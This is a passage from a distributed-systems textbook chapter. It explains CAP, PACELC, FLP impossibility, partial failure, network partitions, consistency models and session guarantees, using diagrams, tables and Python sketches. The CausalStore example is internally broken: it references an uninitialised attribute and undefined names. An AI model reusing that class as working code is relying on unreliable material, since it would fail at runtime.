The choice is per operation, not per system. The same database can serve reads of a product description with AP semantics and a stock decrement with CP semantics. Systems that force one global setting are limiting you unnecessarily.
CAP is only about partitions. It says nothing about the normal case, which is 99.9% of the time. A system's everyday consistency and latency behaviour is described by PACELC, the next topic.
"CA" systems do not exist in a distributed setting. A single-node database is CA in a trivial sense — no partitions are possible inside one machine — but the moment there are two nodes, P is mandatory. Vendors claiming CA are describing behaviour in the absence of the only condition the theorem is about.
Key Takeaways
- CAP's "pick two" framing misleads: partition tolerance is mandatory, so the real choice is C or A during a partition.
- The C in CAP is linearizability, not ACID's consistency.
- Choose per operation based on the cost of a wrong answer versus the cost of an error.
- CAP says nothing about normal operation, and no genuinely distributed system is "CA".
🧪 Practice
- Classify as CP or AP and justify: DNS, a bank transfer, a like counter, a distributed lock, a product catalogue.
- Explain in two sentences why "we chose CA" is not a coherent design statement for a multi-node system.
- Interview: Your system is CP and a partition takes down a data centre for 20 minutes. What do users experience, and what would AP have cost you instead? (Hint: describe both the outage and the reconciliation you avoided.)
PACELC Theorem
CAP describes behaviour during partitions, which are rare. PACELC, formulated by Daniel Abadi in 2010, extends it to cover the case that is true almost all of the time — the network working normally — and in doing so it explains far more of a system's observed behaviour.
The formulation reads: if there is a Partition (P), choose between Availability (A) and Consistency (C); Else (E), choose between Latency (L) and Consistency (C).
The second half is the contribution. Even with a perfectly healthy network, a system that guarantees consistency must coordinate before answering — contact a quorum, wait for a leader, confirm replication — and coordination takes time. A system willing to return a possibly-stale local value answers immediately. That trade exists constantly, not only during incidents, and it dominates the latency users actually experience.
THE EVERYDAY TRADE (no partition in sight)
CONSISTENT READ LOW-LATENCY READ
client -> replica in eu-west client -> replica in eu-west
| |
| must confirm with a | answers from local
| quorum spanning regions | state immediately
v v
us-east + ap-south response in 1 ms
|
v May be stale by the current
response in ~120 ms replication lag (ms to s).
Nothing is broken in either case. This is a design choice being paid for
on EVERY request, not an exceptional condition.
The four PACELC classes and where real systems sit:
| Class | During a partition | Normally | Examples |
|---|---|---|---|
| PC/EC | Consistency | Consistency | Spanner, etcd, ZooKeeper, HBase |
| PC/EL | Consistency | Latency | PNUTS |
| PA/EL | Availability | Latency | Dynamo, Cassandra, Riak (defaults) |
| PA/EC | Availability | Consistency | MongoDB (with majority writes) |
# The same client library, three PACELC positions, chosen per query.
# Cassandra makes the trade explicit at the call site, which is the right
# design: the trade belongs to the operation, not to the deployment.
# PA/EL: fastest possible, may be stale. Right for a view counter.
session.execute(stmt, consistency_level=ConsistencyLevel.ONE)
# Stronger: R + W > N gives read-your-writes across the cluster at the cost
# of contacting a majority on every operation.
session.execute(stmt, consistency_level=ConsistencyLevel.QUORUM)
# PC/EC across regions: correct everywhere, and slow everywhere, because a
# quorum now spans continents and inherits the speed of light.
session.execute(stmt, consistency_level=ConsistencyLevel.EACH_QUORUM)
# Why the "E" half usually matters more than the "P" half, quantified.
PARTITION_MINUTES_PER_YEAR = 60 # a generous estimate for one system
MINUTES_PER_YEAR = 525_600
partition_fraction = PARTITION_MINUTES_PER_YEAR / MINUTES_PER_YEAR
print(f"partitioned: {partition_fraction:.4%} of the time")
# partitioned: 0.0114% of the time
#
# The CAP choice governs 0.01% of your operating life.
# The ELSE choice governs the other 99.99% -- and shows up in p99 latency on
# every dashboard you own. Teams routinely spend weeks debating the first and
# accept the second by accident, through a client-library default.
The practical value of PACELC is that it forces the second question to be asked out loud. "Are we CP or AP?" is a conversation about a rare event. "What are we paying in latency for consistency on the read path, and is that price worth it for this query?" is a conversation about every request the system serves.
Key Takeaways
- PACELC extends CAP with the normal-operation trade: latency versus consistency when there is no partition.
- Consistency requires coordination, and coordination costs a round trip — paid on every request, not only during incidents.
- Systems are classified as PC/EC, PC/EL, PA/EL, or PA/EC; the best ones let you choose per operation.
- The "else" branch governs virtually all of a system's lifetime and dominates observed latency.
🧪 Practice
- Place these on the PACELC grid: PostgreSQL with synchronous replication, DynamoDB eventually-consistent reads, etcd, Cassandra with
QUORUM.- For a three-region deployment, estimate the added read latency of
QUORUMversusONEand state which endpoints should pay it.- Interview: Your p99 read latency is 140 ms and the database is idle. What do you suspect? (Hint: an idle database that answers slowly is usually waiting for something other than disk.)
FLP Impossibility Result
The Fischer-Lynch-Paterson result of 1985 is the deepest constraint in the chapter. It states that in an asynchronous system where even one process may fail by crashing, there is no deterministic algorithm that guarantees consensus — agreement on a single value — in bounded time.
The word doing all the work is asynchronous, which here has a precise meaning: there is no bound on message delay and no bound on process speed. Under those conditions, a process that has not responded is indistinguishable from a process that is merely slow. And that single ambiguity is enough to defeat every deterministic protocol.
THE AMBIGUITY AT THE HEART OF FLP
node A waits for a message from node B.
B crashed -> A must proceed without B, or wait forever
B is slow -> A must wait, or it may violate agreement
the message was slow -> same as above
In an asynchronous model these are INDISTINGUISHABLE, no matter how long
A waits. Waiting longer never resolves it -- there is no bound to exceed.
If A proceeds: it may disagree with B (safety violated).
If A waits: it may wait forever (liveness violated).
FLP: no deterministic algorithm escapes this. It is not about being clever.
The result is stated in terms of safety and liveness, and the distinction matters for everything that follows:
- Safety: nothing bad happens — no two nodes decide different values.
- Liveness: something good eventually happens — a decision is reached.
FLP says you cannot deterministically guarantee both under asynchrony with one possible crash. Every practical consensus system responds by keeping safety unconditionally and relaxing liveness: Raft and Paxos never allow two conflicting decisions, but they can stall indefinitely if the network behaves adversarially. In practice they make progress because real networks are not adversarial for long.
# What FLP forbids, and what real systems do instead.
def naive_consensus(nodes, value, timeout):
"""This function cannot be made correct. Included to show WHY."""
responses = broadcast_and_wait(nodes, value, timeout)
if len(responses) < majority(nodes):
# We timed out. But a timeout does not mean the node is dead --
# it means we stopped waiting. Choosing a timeout is choosing to
# GUESS about failure, and the guess can be wrong in both directions.
raise NoDecision()
return decide(responses)
# The three real escapes from FLP -- none of which contradict it:
#
# 1. PARTIAL SYNCHRONY (Raft, Paxos, Zab): assume the network is EVENTUALLY
# well-behaved. Safety always holds; liveness holds once messages start
# arriving within some bound. Timeouts become failure DETECTORS, and a
# wrong guess costs an extra election, never a wrong decision.
#
# 2. RANDOMIZATION (Ben-Or, and modern BFT protocols): terminate with
# probability 1 rather than with certainty. FLP applies to deterministic
# algorithms, so a coin flip sidesteps it.
#
# 3. FAILURE DETECTORS (Chandra-Toueg): assume an oracle that eventually
# stops suspecting correct processes. This is a formalization of what a
# well-tuned heartbeat gives you in practice.
The practical consequence appears everywhere in this chapter: every timeout in a distributed system is a guess about whether a remote process is dead, and because FLP guarantees the guess can be wrong, systems must be correct even when it is. That is why Raft uses randomized election timeouts (to avoid repeated split votes), why leases have fencing tokens (so a wrongly-suspected leader cannot corrupt state when it returns), and why a "dead" node reappearing must never be able to act as if no time has passed.
| Response to FLP | What it gives up | Used by |
|---|---|---|
| Partial synchrony | Guaranteed termination time | Raft, Paxos, Zab, Viewstamped Replication |
| Randomization | Determinism | Ben-Or, HoneyBadgerBFT |
| Failure detectors | Perfect accuracy | Chandra-Toueg family |
| Abandon consensus | Agreement itself | CRDTs, gossip, AP stores |
Key Takeaways
- FLP: in an asynchronous system with one possible crash failure, no deterministic algorithm guarantees consensus in bounded time.
- The obstacle is that a crashed process and a slow process are indistinguishable without a bound on delay.
- Real protocols keep safety unconditionally and accept that liveness may stall, assuming partial synchrony to make progress in practice.
- Every timeout is a guess about failure that can be wrong, so correctness must never depend on the guess being right.
🧪 Practice
- Explain why waiting longer never resolves the crashed-versus-slow ambiguity in the asynchronous model.
- For Raft, name which property is guaranteed unconditionally and which is conditional, and on what.
- Interview: If consensus is impossible, how does etcd work? (Hint: the theorem's assumptions include one that real networks violate in a helpful direction.)
Partial Failure
In a single-process program, failure is total: the process either runs or it crashes, and every part of it shares that fate. In a distributed system, failure is partial — some components fail while others continue, and the survivors often cannot tell which is which.
This is the qualitative difference that makes distributed systems hard. A local function call has two outcomes: it returns or it throws. A remote call has at least five, and one of them has no observable difference from another.
LOCAL CALL REMOTE CALL
result = f(x) result = svc.f(x)
outcomes: outcomes:
1. returns a value 1. executed, response received
2. raises 2. executed, response LOST -> looks like 4
3. never arrived -> looks like 4
4. timed out (unknown)
5. partially executed, then the callee died
(the write landed; the event was never sent)
Outcome 5 is the dangerous one: the system is now in a state that no
single component's code believed was possible.
Partial failure produces a specific family of bugs that do not exist in single-process software:
Inconsistent state across components. A handler writes to the database, then crashes before publishing the event. The database says the order exists; the downstream services never heard of it. Neither is wrong; the system is inconsistent because the two writes were not atomic. This is precisely the problem the outbox pattern (Section 8.5) exists to solve.
Gray failure. A node that is neither up nor down — responding to health checks while failing real requests, or serving at 5% of normal speed. These are harder than crashes, because every automated mechanism keyed on "is it responding?" concludes that it is fine.
Cascading failure. One component's slowness consumes the callers' threads, which makes the callers slow, which consumes their callers' threads. The original failure is small; the outage is total.
# The classic partial-failure bug, and why it is not fixable with try/except.
def place_order(order):
order_id = db.insert_order(order) # succeeds
# X process killed here (OOM, deploy, node failure)
events.publish("OrderPlaced", order_id) # never runs
return order_id
# Result: an order exists that no downstream service will ever process. No
# exception was raised anywhere; no log line records a failure. The order is
# simply invisible to the rest of the company.
# The fix is not error handling -- it is making the two writes atomic by
# putting them in the same transactional boundary (the outbox pattern).
def place_order(order):
with db.transaction():
order_id = db.insert_order(order)
db.insert_outbox("OrderPlaced", {"order_id": order_id}) # SAME txn
return order_id
# A separate relay publishes from the outbox table with at-least-once
# delivery. A crash anywhere now leaves a consistent state: either both rows
# exist or neither does.
Designing for partial failure means assuming that every remote interaction can half-happen, and structuring the system so that a half-happened operation is either completed or undone rather than left ambiguous:
| Technique | What it addresses |
|---|---|
| Idempotency | Safe retries after ambiguous outcomes |
| Timeouts on every call | Prevents unbounded waiting on a dead peer |
| Circuit breakers | Stops calls to a failing dependency |
| Bulkheads | Confines one failure to its own resource pool |
| Atomic write boundaries | Removes the "wrote one, not the other" state |
| Reconciliation jobs | Detects and repairs drift that slipped through |
The last one is underused and deserves emphasis. However careful the design, some inconsistency will occur; a periodic job that compares two sources of truth and reports or repairs divergence is the only mechanism that finds problems nobody anticipated. Systems that handle money almost always have one.
Key Takeaways
- Partial failure means some components fail while others continue, and survivors often cannot determine which.
- A remote call has at least five outcomes, several of which are indistinguishable from a timeout.
- The characteristic bug is a half-completed multi-step operation; the fix is an atomic write boundary, not better error handling.
- Gray failures defeat health checks, and reconciliation jobs are what catch the drift no design anticipated.
🧪 Practice
- List every partial-failure state of "charge the card, create the order, send the email" and say which are recoverable.
- Explain why a
try/finallyaround the publish call does not fix the order bug above.- Interview: How would you detect that your database and search index have silently drifted apart? (Hint: what would you compare, and how often, given that neither reported an error?)
Network Partitions
A network partition is a failure that splits a system into groups of nodes that cannot communicate with each other, while nodes within each group communicate normally. It is the specific condition that CAP is about, and it is far more varied — and more common — than the textbook picture of a cleanly severed cable suggests.
The reason partitions are treated as a category of their own is that, unlike a crash, the isolated nodes keep running. A crashed node does nothing. A partitioned node continues to serve requests, accept writes, and believe it is healthy, all while operating on a view of the world that is diverging from the other side's. Two halves of a system can both be "up" and both be wrong.
PARTITION TYPES (increasing order of difficulty)
1. COMPLETE 2. PARTIAL 3. ASYMMETRIC (one-way)
A B | C D A --- B A ---> B (A reaches B)
| | \ | A <-X- B (B cannot reply)
two groups, no | X |
cross-traffic C --- D Each node's view of who is
reachable DISAGREES with the
Easiest: quorum C cannot reach B, other's -- failure detectors
resolves it everyone else can give contradictory answers
4. INTERMITTENT (flapping) 5. SLOW (a partition in effect)
connectivity returns and messages arrive after 30 seconds. Nothing
drops every few seconds is "down"; every timeout fires anyway.
-> repeated elections, -> the system behaves as partitioned while
repeated failovers every health check reports success
The most dangerous consequence is split brain: both sides elect a leader, both accept writes, and the two histories diverge irreconcilably. When the partition heals, there is no correct merge — two customers were sold the last item, two conflicting balances exist, and someone must decide which reality to discard.
Quorum is the standard defence. Requiring a majority to make progress guarantees that at most one side can have one, since two majorities of the same set must overlap:
def can_make_progress(reachable_nodes, cluster_size):
"""Majority quorum: at most one partition can satisfy this, ever."""
return reachable_nodes > cluster_size // 2
# 5-node cluster split 3/2:
# side of 3 -> 3 > 2 -> proceeds as the authoritative side
# side of 2 -> 2 > 2 is False -> refuses writes, steps down if it was leader
#
# Note what this costs: the minority side is UNAVAILABLE even though its nodes
# are perfectly healthy. That is the CAP choice being made mechanically.
def tolerated_failures(cluster_size):
return (cluster_size - 1) // 2
for n in (1, 2, 3, 4, 5, 6, 7):
print(f"{n} nodes -> tolerates {tolerated_failures(n)} failures")
# 3 nodes -> 1 5 nodes -> 2 7 nodes -> 3
# 4 nodes -> 1 6 nodes -> 2
#
# EVEN CLUSTER SIZES ARE WASTEFUL: 4 nodes tolerate the same single failure
# as 3, while adding a node that must be paid for and coordinated with.
# This is why quorum systems are almost always deployed with odd sizes.
Quorum alone is not sufficient, because a leader that is partitioned away does not instantly know it has lost quorum. For a brief window it may still believe it is the leader and act on that belief. Two mechanisms close the gap:
Leases with expiry. A leader holds a time-bounded lease and must stop acting before it expires unless renewed. Combined with a follower rule of "do not elect a new leader until the old lease could not still be valid", this bounds the overlap.
Fencing tokens. Every leadership term gets a monotonically increasing number, and downstream systems reject writes carrying a token lower than the highest they have seen. A stale leader that returns after a partition is rejected by the storage layer itself, regardless of what it believes.
# Fencing: the storage layer enforces what the coordinator cannot guarantee.
def write_with_fence(resource, value, token):
current = store.get_fence_token(resource)
if token < current:
# A previously-partitioned leader has come back and is still acting.
# It cannot be trusted to know it was replaced -- reject it here.
raise StaleLeader(f"token {token} < {current}")
store.put(resource, value, fence_token=token)
A final point on testing. Partitions are rare enough that they are never naturally exercised before production, which is why deliberate fault injection — blocking traffic between nodes, adding one-way latency, flapping links — is the only way to know how a system behaves in the condition its entire design is premised on.
Key Takeaways
- A partition leaves nodes running but unable to communicate, so both sides can be simultaneously healthy and divergent.
- Partitions are frequently partial, asymmetric, flapping, or expressed as extreme slowness rather than clean splits.
- Majority quorum guarantees at most one side can proceed, at the cost of the minority's availability; use odd cluster sizes.
- Quorum needs leases and fencing tokens to handle a stale leader that has not yet learned it was replaced.
🧪 Practice
- For a 6-node cluster, compute the failures tolerated and explain why 5 or 7 would be a better choice.
- Describe a concrete split-brain scenario in an inventory system and the business consequence when the partition heals.
- Interview: Your leader is partitioned from the followers but can still reach the database. What breaks, and which mechanism prevents it? (Hint: the leader does not yet know it has been replaced — who else could know?)
<a id="82-consistency-models"></a>
8.2 Consistency Models
A consistency model is a contract between a data store and its users: given these operations, which results are legal? The models form a hierarchy from strongest and slowest to weakest and fastest, and choosing among them is one of the highest-leverage decisions in a distributed design.
Strong Consistency and Linearizability
Linearizability is the strongest single-object consistency model. It guarantees that the system behaves as if there were exactly one copy of the data and every operation took effect instantaneously at some point between when it was invoked and when it returned. Operations appear in a single total order, and that order respects real time: if operation A completes before operation B begins, A comes first.
The reason this is worth wanting is that it makes a distributed system indistinguishable from a single machine. Every subtle question — can I read a value I just wrote, can two clients see different orders of the same events, can a value go backwards — has the obvious answer. Linearizability is the model that requires no reasoning at all, which is why it is the right default whenever it is affordable.
The analogy is a single physical ledger on one desk. Everyone writes and reads from that one book, one at a time. Nobody can see a page that was already overwritten, and if you finish writing before I start reading, I see your entry.
LINEARIZABLE (legal) NOT LINEARIZABLE (illegal)
client A: |--write(x=1)--| client A: |--write(x=1)--|
client B: |-read->1 client B: |-read->0
client C: |-read->1 client C: |-read->1
^
Once the write COMPLETES, every B read 0 AFTER the write
later read sees it. There is one completed, then C read 1.
point in time where x becomes 1. The value appears to go
backwards in real time.
Linearizability is a recency guarantee about single objects, and both halves of that phrase matter. It says nothing about multi-object operations — for that you need serializability, which is a transactional property. A system can be linearizable per key and still allow you to observe a state where money left one account and has not yet arrived in the other.
# Achieving linearizability costs coordination on BOTH paths.
# Reading from a leader is not sufficient: the leader may have been deposed
# by a partition and not yet know it.
def linearizable_read(key):
# Option 1: ReadIndex -- confirm we are still leader by exchanging a
# heartbeat round with a quorum before answering.
if not raft.confirm_still_leader_via_quorum(): # one round trip
raise NotLeader()
return raft.state_machine.get(key)
def lease_read(key):
# Option 2: leader leases -- cheaper, but its correctness depends on a
# bound on clock drift, which is an assumption about hardware rather
# than about messages.
if time.monotonic() > raft.lease_expiry:
return linearizable_read(key) # fall back to a quorum
return raft.state_machine.get(key) # no network round trip
def stale_read(key):
# NOT linearizable: fast, and may return a value that was already
# superseded. Legitimate for many reads -- but say so explicitly.
return local_replica.get(key)
The costs are unavoidable and follow directly from the definition. Every linearizable operation requires coordination, so latency is bounded below by a round trip to a quorum — across regions, that is tens to hundreds of milliseconds. Availability suffers because a minority partition must refuse service. And throughput is bounded by the coordination path, not by the storage.
| System | Linearizable? |
|---|---|
| etcd, ZooKeeper, Consul | Yes, by design |
| Spanner | Yes (TrueTime bounds clock uncertainty) |
| PostgreSQL single primary | Yes for reads on the primary |
| PostgreSQL async replicas | No — replicas lag |
| DynamoDB | Optional per read (ConsistentRead) |
Cassandra QUORUM | Close, but not strictly linearizable |
| Redis with replicas | No — asynchronous replication |
Use linearizability where a stale answer causes an incorrect decision: distributed locks, leader election, unique constraint enforcement, inventory decrements, account balances. Avoid paying for it on timelines, counters, recommendations, and search results, where nobody can perceive the difference.
Key Takeaways
- Linearizability makes a distributed system behave like a single copy with operations ordered in real time.
- It is a per-object recency guarantee, not a multi-object transactional one.
- It requires coordination on reads as well as writes; leader reads alone are not sufficient without a quorum check or a lease.
- Reserve it for operations where staleness causes a wrong decision, since it costs a quorum round trip on every access.
🧪 Practice
- Draw a timeline of three clients that is sequentially consistent but not linearizable.
- Explain why reading from a Raft leader without a ReadIndex or lease can return stale data.
- Interview: Why is linearizability insufficient for a bank transfer? (Hint: count how many objects the operation touches.)
Sequential Consistency
Sequential consistency, defined by Leslie Lamport in 1979, requires that all operations appear in some single total order, and that each individual process's operations appear in that order in the sequence it issued them. What it drops, relative to linearizability, is the requirement that the order respect real time.
That single omission is the whole difference. Under linearizability, if your write finishes at 10:00:00 and my read starts at 10:00:01, I must see your write. Under sequential consistency, I need not — as long as everyone agrees on some consistent order, and nobody sees any single process's own operations out of order.
The analogy is a group chat where every participant sees the same final transcript, but messages may appear in a different order than they were actually sent — as long as each person's own messages stay in their sent order, and everybody's transcript is identical.
SEQUENTIALLY CONSISTENT BUT NOT LINEARIZABLE
real time -->
P1: |--write(x=1)--|
P2: |--write(y=1)--|
P3: |-read(y)->1--| |-read(x)->0--|
P3 sees y=1 but x=0, even though x was written FIRST in real time.
Legal under sequential consistency: everyone can agree on the order
write(y=1), read(y)->1, read(x)->0, write(x=1)
which is internally consistent and preserves each process's own order.
Illegal under linearizability: write(x=1) completed before read(x) began,
so the read must return 1.
The practical significance is that sequential consistency permits an implementation to serve reads from a replica that is behind, provided the replica applies updates in a consistent global order. That removes the real-time coordination requirement and can substantially reduce read latency, while still giving applications a single coherent view of history.
# A sequentially consistent replica: applies a globally ordered log, but may
# be behind. All replicas converge to the SAME order -- just not at the same
# real time.
class SequentialReplica:
def __init__(self):
self.state, self.applied_seq = {}, 0
def apply(self, seq, key, value):
# Operations arrive with a globally assigned sequence number and are
# applied strictly in order. Gaps are waited for, never skipped --
# skipping is what would break the total order.
assert seq == self.applied_seq + 1, "out-of-order application"
self.state[key] = value
self.applied_seq = seq
def read(self, key):
# May return a value that is older than the true current one. What it
# can NEVER do is return a state that no ordering would produce --
# for example, an effect without its cause.
return self.state.get(key)
Where you meet sequential consistency in practice is less often a database
setting than a hardware and language-runtime concept: it is the memory model
that CPUs and compilers approximate, and Java's volatile and C++'s
memory_order_seq_cst provide it for individual variables. In distributed data
stores it appears mostly as an intermediate rung — stronger than causal, weaker
than linearizable — and relatively few systems offer it as an explicit option,
because the cost saving relative to linearizability is smaller than the cost
saving of dropping all the way to causal or eventual.
| Model | Total order | Respects real time | Per-process order |
|---|---|---|---|
| Linearizable | Yes | Yes | Yes |
| Sequential | Yes | No | Yes |
| Causal | No | No | Yes |
| Eventual | No | No | Not guaranteed |
The composability difference is worth knowing for interviews and for design reviews: linearizability composes, sequential consistency does not. If every object in a system is individually linearizable, the system as a whole is linearizable. If every object is individually sequentially consistent, the combination may not be — the orders chosen per object need not agree with one another.
Key Takeaways
- Sequential consistency requires one agreed total order that preserves each process's own operation order, but need not match real time.
- It permits reads from replicas that lag, provided all replicas apply the same order.
- It is most familiar as a memory model (
volatile,seq_cst) rather than a database setting.- Unlike linearizability, it does not compose across objects.
🧪 Practice
- Give an execution that is sequentially consistent, and explain which linearizability requirement it violates.
- Explain why the replica class above must wait for a gap rather than skip it.
- Interview: Two objects are each sequentially consistent. Is the pair? (Hint: each object gets to pick its own order — must those two choices agree?)
Causal Consistency
Causal consistency guarantees that operations related by cause and effect are seen in the same order by everyone, while operations that are unrelated (concurrent) may be seen in different orders by different observers.
The motivation is that most anomalies users actually notice are causality violations, not ordering violations in the abstract. Seeing a reply before the message it replies to is confusing. Seeing two unrelated posts in a different order than your friend did is invisible. Causal consistency spends coordination only where it buys something perceptible.
THE ANOMALY CAUSAL CONSISTENCY PREVENTS
Alice posts: "I lost my job" (event 1)
Alice deletes it, posts: "April fools!" (event 2, CAUSED BY event 1)
Bob replies: "That's terrible!" (event 3, CAUSED BY event 1)
Under EVENTUAL consistency, Carol may see:
"That's terrible!" <- a reply
"I lost my job" <- the thing replied to, arriving after
or worse, Bob's reply attached to a post that Carol never received.
Under CAUSAL consistency, Carol is guaranteed to see event 1 before
event 3, because event 3 causally depends on event 1. Whether she sees
event 2 before or after some UNRELATED post by Dave is left open --
and nobody can tell the difference.
Causality is established by the happens-before relation (covered fully in Section 8.3): operation A happens-before B if A occurred earlier in the same process, or if B read a value that A wrote, or by transitivity through a chain of such links. Everything not related by happens-before is concurrent, and concurrent operations may be ordered arbitrarily.
# Causal consistency is implemented by shipping dependencies with each write.
class CausalStore:
def __init__(self, node_id):
self.node_id = node_id
self.state = {}
self.clock = {} # vector clock: node -> highest seen counter
self.pending = [] # writes whose dependencies are not yet met
def write(self, key, value):
self.clock[self.node_id] = self.clock.get(self.node_id, 0) + 1
# The write carries the writer's full causal history. Anyone applying
# it must first have applied everything the writer had seen.
return {"key": key, "value": value, "deps": dict(self.clock),
"origin": self.node_id}
def read(self, key):
value = self.state.get(key)
# Reading creates a causal dependency: anything this process writes
# next is causally after the write it just observed.
if key in self.write_clocks:
self._merge(self.write_clocks[key])
return value
def receive(self, update):
if self._deps_satisfied(update["deps"]):
self._apply(update)
self._drain_pending() # applying one may unblock others
else:
self.pending.append(update) # BUFFER: do not apply an effect
# before its cause has arrived
def _deps_satisfied(self, deps):
# Every dependency the writer had must already be reflected locally.
return all(self.clock.get(n, 0) >= c
for n, c in deps.items() if n != update_origin(deps))
Causal consistency sits at an important theoretical boundary: it is the strongest model that remains available during a network partition. Both sides of a partition can continue accepting reads and writes, buffering updates until dependencies arrive, and converge afterwards without ever showing an effect before its cause. Nothing stronger has that property, which is why it is the target for AP systems that still want to avoid visible nonsense.
| Model | Available under partition | Prevents causality violations |
|---|---|---|
| Linearizable | No | Yes |
| Sequential | No | Yes |
| Causal | Yes | Yes |
| Eventual | Yes | No |
The cost is metadata. Tracking causality precisely requires vector clocks or dependency lists that grow with the number of writers, which is why production systems approximate: they track dependencies per session, or per partition, or truncate old entries. That approximation is usually acceptable, because the causal chains users can perceive are short.
Key Takeaways
- Causal consistency orders causally related operations identically for all observers and leaves concurrent operations unordered.
- It prevents the anomalies users actually notice — effects appearing before their causes — without global coordination.
- It is the strongest consistency model that remains available during a partition.
- Its cost is causal metadata that grows with the number of writers, so real systems approximate it per session or partition.
🧪 Practice
- Give a three-message chat sequence where eventual consistency produces a visible anomaly and causal consistency does not.
- Explain why the
receivemethod buffers instead of applying immediately, and what would break otherwise.- Interview: Why can causal consistency stay available during a partition when sequential consistency cannot? (Hint: what would the two sides have to agree on, and can they do it without talking?)
Eventual Consistency
Eventual consistency makes one promise: if writes stop, all replicas will eventually converge to the same value. It says nothing about how long that takes, what you read in the meantime, or whether successive reads move forward or backward.
Stated that plainly it sounds almost useless, and the honest response is that as a guarantee it is very weak. Its value is not in what it promises but in what it permits: because no coordination is required before answering, every replica can serve reads and accept writes locally, at local latency, during partitions, in any region. For the enormous class of data where a few seconds of staleness is imperceptible, that is an excellent trade.
The analogy is a rumour spreading through an office. Nobody coordinates; each person tells the people near them. For a while different parts of the office believe different things. Given a pause in new gossip, everyone converges on the same story.
CONVERGENCE OVER TIME
t=0 write x=5 at replica A
A: x=5 B: x=(old) C: x=(old) <- divergent, all readable
t=1 A gossips to B
A: x=5 B: x=5 C: x=(old)
t=2 B gossips to C
A: x=5 B: x=5 C: x=5 <- converged
Between t=0 and t=2, a client reading from C gets the old value while a
client reading from A gets the new one. Both replicas are healthy and
correct according to the model.
The critical engineering question is not whether replicas converge but what they converge to when two replicas accepted conflicting writes. That is a conflict-resolution decision, and it is where eventual consistency stops being free:
| Strategy | Behaviour | Data loss risk |
|---|---|---|
| Last-write-wins | Highest timestamp survives | Silently drops writes |
| Highest version | Explicit version counter wins | Same, but explicit |
| Application merge | Custom logic reconciles both | None if written well |
| CRDTs | Mathematically guaranteed convergence | None, by construction |
| Sibling values | Both retained; client resolves | None; complexity moves to the client |
# The anti-guarantee that surprises people: reads can go BACKWARDS.
# Nothing in eventual consistency forbids this.
v1 = read_from(replica_a) # 42 (has the recent write)
v2 = read_from(replica_b) # 17 (does not yet)
v3 = read_from(replica_a) # 42
# A user refreshing a page sees 42, 17, 42. Every read is "correct".
#
# The fix is not a stronger global model -- it is a SESSION guarantee
# (next topic): pin the session to one replica, or track the highest version
# the session has observed and never serve it something older.
# Measuring what eventual actually means for you -- the number that decides
# whether the model is acceptable for a given feature.
def replication_lag_budget(p99_lag_ms, user_action_gap_ms):
"""A staleness window is only acceptable if users cannot outrun it."""
return {
"p99_lag_ms": p99_lag_ms,
"user_returns_within_ms": user_action_gap_ms,
"anomaly_visible": user_action_gap_ms < p99_lag_ms,
}
print(replication_lag_budget(p99_lag_ms=250, user_action_gap_ms=100))
# {'p99_lag_ms': 250, 'user_returns_within_ms': 100, 'anomaly_visible': True}
#
# A user who posts a comment and re-renders the page in 100 ms WILL see their
# own comment missing. "Eventually consistent" is fine for other people's
# data and unacceptable for your own -- hence read-your-writes.
Eventual consistency is right for view counts, recommendation results, search indexes, social feeds, analytics aggregates, and DNS. It is wrong wherever a stale read causes an irreversible decision: inventory decrements, balance checks, permission and revocation checks, and uniqueness enforcement.
Key Takeaways
- Eventual consistency promises only convergence in the absence of new writes — no bound on staleness and no ordering guarantees.
- Its value is permitting local reads and writes with no coordination, which makes it fast and partition-tolerant.
- Reads can move backwards; session guarantees, not stronger global models, are the usual fix.
- The real design work is conflict resolution: last-write-wins silently loses data, while CRDTs converge without loss.
🧪 Practice
- Name four data types where eventual consistency is clearly right and three where it is clearly wrong. State the deciding question.
- Explain how a user can observe a value moving backwards, and give two fixes.
- Interview: A product manager asks "how eventual is eventually?". What do you measure and report? (Hint: it is a latency distribution, not a constant.)
Read-Your-Writes and Monotonic Reads
Global consistency models describe what all clients see collectively. Session guarantees describe what a single client sees over the course of its own session — and they turn out to fix most of the anomalies users actually complain about, at a fraction of the cost of strengthening the global model.
The insight is that a user does not perceive global inconsistency. They perceive their own inconsistency: their comment vanishing, a number going backwards, their profile update not appearing. Four session guarantees address exactly these:
| Guarantee | Promise |
|---|---|
| Read-your-writes | You always see your own writes |
| Monotonic reads | You never see the data move backwards |
| Monotonic writes | Your writes are applied in the order you issued them |
| Writes-follow-reads | Your write is ordered after the write you read before it |
Read-your-writes (read-after-write consistency) is the most important. Its absence produces the single most-reported bug in replicated systems: the user edits their profile, the page reloads from a lagging replica, and the change is gone. They edit again. Now there are two writes, and support has a ticket.
WITHOUT READ-YOUR-WRITES WITH READ-YOUR-WRITES
user --write--> [ primary ] user --write--> [ primary ]
| async | records the
user --read---> [ replica ] user --read--> routed to primary
(behind) (or to a replica
| known to be caught up)
sees the OLD value
"my edit didn't save!" sees the NEW value
There are four implementations, in increasing order of sophistication:
# 1. Route to the primary for a window after any write. Simple, effective,
# and it concentrates load on the primary -- fine when writes are rare.
def read(user_id, key):
if session.last_write_at and time.time() - session.last_write_at < 5.0:
return primary.get(key)
return replica.get(key)
# 2. Sticky routing: pin the session to one replica. Gives monotonic reads
# too, but breaks when that replica is removed or rebalanced.
# 3. Version tokens -- the most precise and the most portable. The client
# carries the version it has observed; the server refuses to serve older.
def write(key, value):
version = primary.put(key, value)
session.max_version = max(session.max_version, version) # remember it
return version
def read(key):
replica = pick_replica()
if replica.applied_version < session.max_version:
# This replica has not caught up to what this session already saw.
replica = primary # or wait, or try another replica
return replica.get(key)
# 4. Write-through cache: serve the session its own write from a local or
# edge cache while replication catches up. Common in web frameworks.
Monotonic reads prevents the mirror-image anomaly: values moving backwards because successive reads landed on replicas with different lag. The fix is the same version-token mechanism — never serve a session a version lower than the highest it has already observed.
# Monotonic reads via a high-water mark carried in the session.
def monotonic_read(key):
seen = session.versions.get(key, 0)
for replica in candidate_replicas():
value, version = replica.get_with_version(key)
if version >= seen: # never go backwards for THIS session
session.versions[key] = version
return value
return primary.get_with_version(key)[0] # last resort: the source of truth
The reason session guarantees are such good value is arithmetic. Making the whole system linearizable means every operation pays a quorum round trip. Providing read-your-writes means a small fraction of reads — those from sessions that recently wrote — are routed differently. In a typical read-heavy workload that is a few percent of traffic paying the cost, instead of all of it.
# Why the cheap fix is usually the right one.
READ_QPS, WRITE_QPS, WINDOW_S = 50_000, 500, 5.0
sessions_needing_primary = WRITE_QPS * WINDOW_S # 2,500 concurrent
affected_reads = sessions_needing_primary * 0.4 # ~1,000 reads/s
print(f"{affected_reads / READ_QPS:.1%} of reads need the primary")
# 2.0% of reads need the primary
#
